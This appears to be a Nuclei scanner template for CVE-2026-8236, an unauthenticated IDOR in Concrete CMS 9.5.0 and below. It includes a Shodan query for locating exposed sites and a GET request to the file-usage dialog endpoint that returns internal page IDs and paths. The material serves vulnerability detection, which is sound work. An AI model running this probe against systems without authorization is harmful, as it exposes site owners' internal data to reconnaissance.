id: CVE-2026-8236 info: name: Concrete CMS <9.5.1 - Unauthenticated File-Usage Internal Metadata Disclosure author: str4k3r severity: medium description: | Concrete CMS 9.5.0 and below is vulnerable to IDOR combined with a missing authentication gate. The endpoint /ccm/system/dialogs/file/usage/{fID} accepts an integer file ID in the URL and returns internal site structure data (page IDs, versions, URL paths) to anyone who sends a GET request. impact: | Remote attackers can access internal site structure data, potentially exposing sensitive information about the site. remediation: | Update to a version later than 9.5.0 or the latest available version. reference: - https://documentation.concretecms.org/9-x/developers/9.5.1-security-releases classification: cve-id: CVE-2026-8236 epss-score: 0.00523 epss-percentile: 0.42547 cwe-id: CWE-862 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 metadata: verified: true max-request: 1 vendor: concretecms product: concrete_cms shodan-query: html:"/index.php/ccm/system/" tags: cve,cve2026,concretecms,concrete5,cms,unauth,exposure http: - method: GET path: - "{{BaseURL}}/index.php/ccm/system/dialogs/file/usage/1" matchers-condition: and matchers: - type: word part: body words: - 'Page ID' - 'class="ccm-ui"' - 'Handle' condition: and - type: status status: - 200 # digest: 4a0a0047304502200b42a1ed06d125def87b220974c99e31baa33a53ef32d6fbe649133e7fb67d67022100ba66bf0e32d461395968def9b8b9eb5ab12459e67c342a2ebe1f1c976cc7e533:922c64590222798bb761d5b6d8e72950